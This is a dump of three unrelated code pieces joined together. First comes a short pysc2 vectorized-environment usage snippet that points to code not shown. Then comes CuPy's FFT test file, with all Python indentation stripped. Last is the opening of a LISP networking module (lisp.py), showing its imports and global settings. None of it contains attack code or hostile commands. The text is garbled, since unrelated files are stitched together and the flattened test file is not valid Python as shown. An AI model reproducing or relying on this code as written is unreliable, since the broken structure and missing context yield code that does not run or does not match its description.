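A minimal sketch of driving the vectorized environment above (the map name is a placeholder; any pysc2 mini-game map would do):

if __name__ == '__main__':
    venv = SubprocVecEnv(nenvs=2, nscripts=0, map_name='DefeatRoaches')
    obs, rews, dones, infos, army, groups, selected, xy = venv.reset()
    print(obs.shape)  # (2, 1, 32, 32): one stacked screen layer per env
    venv.close()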
test_fft.py
|
import functools
import unittest
import pytest
import numpy as np
import cupy
from cupy import testing
from cupy.fft import config
from cupy.fft.fft import _default_fft_func, _fft, _fftn
import six
def nd_planning_states(states=[True, False], name='enable_nd'):
"""Decorator for parameterized tests with and wihout nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
name(str): Argument name to which specified dtypes are passed.
    This decorator adds a keyword argument specified by ``name``
    to the test fixture. Then, it runs the fixture once per element
    of ``states``, passing each element to the named argument.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho', ''],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
        # np.fft.fft always returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
    # NumPy 1.17.0 and 1.17.1 raise ZeroDivisionError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftOrder(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
        # np.fft.fft always returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.gpu
class TestDefaultPlanType(unittest.TestCase):
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd CUFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
assert fft_func is _fftn
else:
assert fft_func is _fft
# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
@testing.gpu
@testing.slow
class TestFftAllocate(unittest.TestCase):
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in six.moves.range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft2(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': [-1, -2], 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The CUFFT plan and a.shape do not match' in str(ex.value)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFft(unittest.TestCase):
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
        # np.fft.fft always returns np.complex128
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1), 'norm': None},
)
@testing.gpu
class TestFftnContiguity(unittest.TestCase):
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfft(self, xp, dtype):
        # the scaling in old NumPy (< 1.13) is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.n is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft2(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype):
        # the scaling in old NumPy (< 1.13) is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.s is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfftn(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestHfft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_hfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftfreq(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftshift(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading(unittest.TestCase):
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
|
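For reference, a minimal sketch of the plan-reuse pattern that TestPlanCtxManagerFft and TestPlanCtxManagerFftn exercise: build a cuFFT plan once with get_fft_plan, then activate it via the context manager so cupy.fft picks it up instead of creating a fresh plan.

import cupy
from cupyx.scipy.fftpack import get_fft_plan

a = cupy.random.random((8, 8)).astype(cupy.complex64)
plan = get_fft_plan(a, axes=(0, 1))  # nd plan covering both axes
with plan:  # cupy.fft.fftn reuses the active plan instead of building one
    out = cupy.fft.fftn(a, axes=(0, 1))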
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519

use_chacha = (os.getenv("LISP_USE_CHACHA") is not None)
use_poly = (os.getenv("LISP_USE_POLY") is not None)
lisp_print_rloc_probe_list = False

lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {}
lisp_map_servers_list = {}
lisp_ddt_map_requestQ = {}
lisp_db_list = []
lisp_group_mapping_list = {}
lisp_map_resolvers_list = {}
lisp_rtr_list = {}
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}

lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []

lisp_test_mr_timer = None
lisp_rloc_probe_timer = None

lisp_registered_count = 0

lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}

lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
lisp_data_plane_security = False
lisp_search_decap_keys = True

lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False

lisp_crypto_ephem_port = None
lisp_pitr = False

lisp_l2_overlay = False

lisp_rloc_probing = False
lisp_rloc_probe_list = {}

lisp_register_all_rtrs = True

lisp_nonce_echoing = False
lisp_nonce_echo_list = {}

lisp_nat_traversal = False

lisp_program_hardware = False

lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"

lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"

lisp_ipc_lock = None

lisp_default_iid = 0
lisp_default_secondary_iid = 0

lisp_ms_rtr_list = []

lisp_nat_state_info = {}

lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()

lisp_last_icmp_too_big_sent = 0
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []

lisp_policies = {}

lisp_load_split_pings = False

lisp_eid_hashes = []

lisp_reassembly_queue = {}

lisp_pubsub_cache = {}

lisp_decent_push_configured = False
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None

lisp_ipc_socket = None

lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}

lisp_rtr_nat_trace_cache = {}

lisp_glean_mappings = []

lisp_gleaned_groups = {}

#
# Open a raw socket for sending ICMP Too-Big messages only when the
# LISP_SEND_ICMP_TOO_BIG environment variable is set.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") is not None):
    lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_ICMP)
    lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)

lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") is not None)
#
